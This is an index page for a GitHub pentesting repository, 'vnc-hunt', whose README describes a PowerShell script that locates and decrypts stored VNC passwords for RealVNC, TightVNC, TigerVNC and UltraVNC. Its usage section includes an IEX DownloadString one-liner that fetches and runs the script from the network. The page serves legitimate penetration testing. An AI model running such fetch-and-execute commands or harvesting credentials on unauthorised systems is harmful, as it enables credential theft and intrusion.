Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/the-viper-one/vnc-hunt
PowerShell script that hunts for local VNC encrypted passwords and decrypts them
https://github.com/the-viper-one/vnc-hunt
decrypt pentesting powershell vnc
Last synced: 16 days ago
JSON representation
PowerShell script that hunts for local VNC encrypted passwords and decrypts them
- Host: GitHub
- URL: https://github.com/the-viper-one/vnc-hunt
- Owner: The-Viper-One
- Created: 2024-06-19T13:11:55.000Z (8 months ago)
- Default Branch: main
- Last Pushed: 2024-06-23T10:46:54.000Z (8 months ago)
- Last Synced: 2024-06-23T11:47:19.605Z (8 months ago)
- Topics: decrypt, pentesting, powershell, vnc
- Language: PowerShell
- Homepage:
- Size: 23.4 KB
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
## About
This PowerShell script searches for VNC passwords stored in the registry and configuration files for various VNC implementations, including RealVNC, TightVNC, TigerVNC, and UltraVNC.
The script identifies and decrypts these passwords using the DES algorithm with a fixed key. It covers the following VNC implementations:
- RealVNC: Searches the registry for VNC server proxy credentials.
- TightVNC: Searches the registry for server passwords, control passwords, and view-only passwords.
- TigerVNC: Searches the registry for server passwords.
- UltraVNC: Searches for passwords in configuration files located in specified directories.### Usage
Load into memory
```
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/VNC-Hunt/main/VNC-Hunt.ps1")
```
Hunt for VNC credentials
```
VNC-Hunt
```
Decrypt supplied encrypted password value
```
VNC-Decrypt -Password FACBCF50C3BF1C08
```![image](https://github.com/The-Viper-One/VNC-Hunt/assets/68926315/28926a62-2b26-4293-b74b-c49a0cf2988e)